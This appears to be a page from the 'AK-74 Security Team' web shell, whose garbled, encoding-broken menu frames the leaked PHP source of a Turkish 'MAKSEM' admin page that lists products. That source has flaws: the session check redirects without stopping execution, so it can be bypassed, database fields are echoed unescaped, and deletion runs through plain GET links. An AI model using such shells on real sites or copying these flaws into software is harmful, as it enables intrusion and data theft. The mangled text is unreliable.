.:: :[ AK-74 Security Team Web-shell ]: ::.
����� ����������
�������� ��������
phpinfo()
��������� PHP
��������� �������
�������������� �����
<?php error_reporting(0); include ('db.php'); @ob_start(); @session_start(); if (!isset($_SESSION['giris'])) { echo header('location:index.php'); } ?> <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Maksem Kontrol Panel| Eklenmiş Ürünler Listesi</title> <!-- Tell the browser to be responsive to screen width --> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <!-- Bootstrap 3.3.6 --> <link rel="stylesheet" href="bootstrap/css/bootstrap.min.css"> <!-- Font Awesome --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.5.0/css/font-awesome.min.css"> <!-- Ionicons --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ionicons/2.0.1/css/ionicons.min.css"> <!-- Theme style --> <link rel="stylesheet" href="dist/css/AdminLTE.min.css"> <!-- AdminLTE Skins. Choose a skin from the css/skins folder instead of downloading all of them to reduce the load. --> <link rel="stylesheet" href="dist/css/skins/_all-skins.min.css"> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body class="hold-transition skin-blue sidebar-mini"> <div class="wrapper"> <header class="main-header"> <!-- Logo --> <a href="anasayfa.php" class="logo"> <!-- mini logo for sidebar mini 50x50 pixels --> <span class="logo-mini"><b>M</b>AKSEM</span> <!-- logo for regular state and mobile devices --> <span class="logo-lg"><b>MAKS</b>EM</span> </a> <!-- Header Navbar: style can be found in header.less --> <nav class="navbar navbar-static-top"> <!-- Sidebar toggle button--> <a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> <div class="navbar-custom-menu"> <ul class="nav navbar-nav"> <!-- Messages: style can be found in dropdown.less--> <!-- Notifications: style can be found in dropdown.less --> <!-- Tasks: style can be found in dropdown.less --> <!-- User Account: style can be found in dropdown.less --> <li class="dropdown user user-menu"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <img src="dist/img/user2-160x160.jpg" class="user-image" alt="User Image"> <span class="hidden-xs">Yönetici</span> </a> <ul class="dropdown-menu"> <!-- User image --> <li class="user-header"> <img src="dist/img/user2-160x160.jpg" class="img-circle" alt="User Image"> <p> Web Sitenizi Kolayca Yönetin <small>2009-2016 MAKSEM</small> </p> </li> <!-- Menu Body --> <li class="user-body"> <!-- /.row --> </li> <!-- Menu Footer--> <li class="user-footer"> <div class="pull-right"> <a href="cikis.php" class="btn btn-default btn-flat">Çıkış Yap</a> </div> </li> </ul> </li> <!-- Control Sidebar Toggle Button --> <li> <a href="#" data-toggle="control-sidebar"><i class="fa fa-gears"></i></a> </li> </ul> </div> </nav> </header> <!-- Left side column. contains the logo and sidebar --> <aside class="main-sidebar"> <!-- sidebar: style can be found in sidebar.less --> <section class="sidebar"> <!-- Sidebar user panel --> <div class="user-panel"> <div class="pull-left image"> <img src="dist/img/user2-160x160.jpg" class="img-circle" alt="User Image"> </div> <div class="pull-left info"> <p>Hoş Geldiniz</p> <a href="#"><i class="fa fa-circle text-success"></i> Online</a> </div> </div> <!-- search form --> <!-- /.search form --> <!-- sidebar menu: : style can be found in sidebar.less --> <?php include('menu.php'); ?> </section> <!-- /.sidebar --> </aside> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Yönetim Paneli<br> <h2><b>Eklenmiş Ürünler Listesi</b></h2> </h1> </section> <!-- Main content --> <section class="content"> <div class="table-responsive mailbox-messages"style="border-radius: 10px; width:100%; height:25%; " > <table class="table table-hover table-striped" > <tr> <td><b>Proje Adı</b></td> <td><b>Şehir</b></td> <td><b>Sil</b></td> </tr> <?php include ('db.php'); $sayfa = intval(@$_GET['sayfa']); if (!$sayfa) { $sayfa = 1; } $bak = $bag->prepare("select * from urunler "); $bak->execute(array()); $toplam= $bak->rowCount(); $limit = 6; $goster = $sayfa*$limit-$limit; $sayfasayisi = ceil($toplam/$limit); $forlimit = 2; $mesajlar = $bag->query("select * from urunler ORDER BY urun_id DESC limit $goster,$limit")->fetchAll(PDO::FETCH_ASSOC); foreach ($mesajlar as $key) { ?> <tbody> <tr> <td class="mailbox-date"><a href="urundetay.php?Git=<?php echo $key['urun_id']; ?>"><?php echo $key['baslik']; ?></td> <td class="mailbox-date" ><img src="../usr/urunler/<?php echo $key['resim']; ?>" style="width: 110px; height: 55px;" /></td> <td class="mailbox-date"><a href="ssil.php?urunsil=<?php echo $key['urun_id']; ?>"><button class="btn btn-primary">Sil</button></a></td> </tr> <?php } ?> </tbody> </table> <center> <?php for ($i= $sayfa - $forlimit ; $i < $sayfa + $forlimit + 1 ; $i++) { if ($i>0 and $i<=$sayfasayisi) { if ($i == $sayfa) { echo "<a href='#'/><button class='active' style='color:#000; font-size:12px; margin:8px; padding:5px;' >".$i."</button></a>"; }else{ echo " <button style='color:#fff; font-size:12px; margin:8px; padding:5px;'><a href='urunler.php?sayfa=".$i."'>".$i."</a></button>"; } } } ?> </center> <!-- /.table --> </div> <!-- /.mail-box-messages --> </div> <!-- /.row --> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <footer class="main-footer"> <strong>Copyright © 2009-2016 <a href="http://tadiyabilisim.com">KENAN ALTUN</a>.</strong> MAKSEM reserved. </footer> <!-- Control Sidebar --> <!-- /.control-sidebar --> <!-- Add the sidebar's background. This div must be placed immediately after the control sidebar --> <div class="control-sidebar-bg"></div> </div> <!-- ./wrapper --> <script src="https://cdn.ckeditor.com/4.5.7/standard/ckeditor.js"></script> <!-- jQuery 2.2.0 --> <script src="plugins/jQuery/jQuery-2.2.0.min.js"></script> <!-- Bootstrap 3.3.6 --> <script src="bootstrap/js/bootstrap.min.js"></script> <!-- FastClick --> <script src="plugins/fastclick/fastclick.js"></script> <!-- AdminLTE App --> <script src="dist/js/app.min.js"></script> <!-- AdminLTE for demo purposes --> <script src="dist/js/demo.js"></script> <script> $(function () { // Replace the <textarea id="editor1"> with a CKEditor // instance, using default configuration. CKEDITOR.replace('editor1'); //bootstrap WYSIHTML5 - text editor $(".textarea").wysihtml5(); }); </script> </body> </html>
Rename:
-